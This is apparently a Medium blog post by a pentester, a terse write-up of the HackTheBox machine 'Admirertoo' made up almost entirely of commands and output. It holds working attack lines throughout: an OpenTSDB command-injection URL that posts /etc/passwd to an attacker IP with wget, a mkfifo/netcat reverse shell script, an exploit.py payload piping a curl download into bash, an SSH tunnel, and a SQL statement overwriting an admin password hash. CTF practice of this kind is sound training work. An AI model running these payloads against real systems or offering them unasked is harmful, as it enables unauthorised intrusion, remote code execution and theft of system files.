HackTheBox-Admirertoo

NMAP

PORT      STATE    SERVICE        VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 99:33:47:e6:5f:1f:2e:fd:45:a4:ee:6b:78:fb:c0:e4 (RSA)
| 256 4b:28:53:64:92:57:84:77:5f:8d:bf:af:d5:22:e1:10 (ECDSA)
|_ 256 71:ee:8e:e5:98:ab:08:43:3b:86:29:57:23:26:e9:10 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Admirer
4242/tcp filtered vrml-multi-use
16010/tcp filtered unknown
16030/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://admirer-gallery.htb' -H "Host: FUZZ.admirer-gallery.htb" --hl 268
/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system('wget%20--post-file%20/etc/passwd%20http://10.10.14.71/:2222/')%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.71 2222 >/tmp/f
sudo python2 exploit.py -p 80 "http://10.10.11.137:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system('curl%20http://10.10.14.71:4444/shell.sh%7Cbash')%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
ssh -L 3333:127.0.0.1:8080 jennifer@10.10.11.137
UPDATE user SET password = '1bc29b36f623ba82aaf6724fd3b16718'  
WHERE user_id=1;
[{"Expires":1,"Discard":false,"Value":"10.10.16.24\n"}]
[{"Expires":1,"Discard":false,"Value":"}]
}] IP
}]| [IP]

References

--

--

--

Pentester | CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Private Proxy — the Best Possible Solution

MAIN UPDATES OF THE S-WALLET ECOSYSTEM

{UPDATE} DOLE PLANTATION Hack Free Resources Generator

INSIDE THE SCAM FACTORY

{UPDATE} Rebirth Heroes Hack Free Resources Generator

The Future of Cybersecurity Education via Public Interest Clinics

{UPDATE} Buggy Car Snow Downhill Racing Hack Free Resources Generator

CyberSoc | Cyber Detective CTF Write Up — Evidence Investigation

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store

ARZ101

Pentester | CTF Player

More from Medium

Nmap Post Port Scans | TryHackMe (THM)

Your 5 min guide to most useful features in Burp Suite

Whoa now, hold up — CRTP

Certifried & Bloodhound: Active Directory Certificate Services Abuse